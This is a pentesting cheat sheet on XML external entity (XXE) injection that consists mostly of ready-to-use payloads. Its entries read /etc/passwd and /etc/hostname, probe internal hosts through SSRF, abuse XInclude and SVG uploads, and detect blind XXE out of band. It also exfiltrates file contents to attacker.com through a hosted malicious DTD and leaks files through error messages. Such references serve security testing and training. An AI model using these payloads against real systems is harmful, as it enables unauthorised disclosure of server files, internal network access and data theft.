XML external entity (XXE)

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

-- Wikipedia

• PortSwigger - Web Security Academy - XML external entity (XXE) injection

Generally, XXE vulnerabilities arise when resolution of external entities and/or XInclude is enabled in the app/xml parser.

Retrieve files

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE file [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<some><xml>&xxe;</xml></some>

SSRF

<!DOCTYPE request [ <!ENTITY xxe SYSTEM "http://internal.website.com"> ]>

XInclude

You may be able to use XInlcude when you don't have control over the DOCTYPE element, e.g. in SOAP requests.

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

File uploads

Sometimes XML based files like SVG or DOCX can be uploaded and are then processed by the app.

E.g. XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250]

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
	<text font-family="Verdana" font-size="16" x="10" y="40">&xxe;
    </text>
</svg> 

Blind XXE

You can use out-of-band (OAST) to detect blind XXE vulnerabilities (e.g. using Burp Collaborator).

<!DOCTYPE oast [ <!ENTITY xxe SYSTEM "https://attacker.com"> ]>

Via parameter entities:

<!DOCTYPE oast [ <!ENTITY % xxe SYSTEM "https://attacker.com"> %xxe; ]>

Exfiltrate data

Create a malicious.dtd file, hosted on attacker controlled system:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

XXE payload on target:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>

Retrieve data via error message

Create a malicious.dtd file, hosted on attacker controlled system:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

XXE payload on target:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>

Modified content type

Some apps accept text/xml as content type of POST requests instead of e.g. application/x-www-form-urlencoded. If so, malicious XML can be send to and will be proccessed by the app and my be exploitable that way.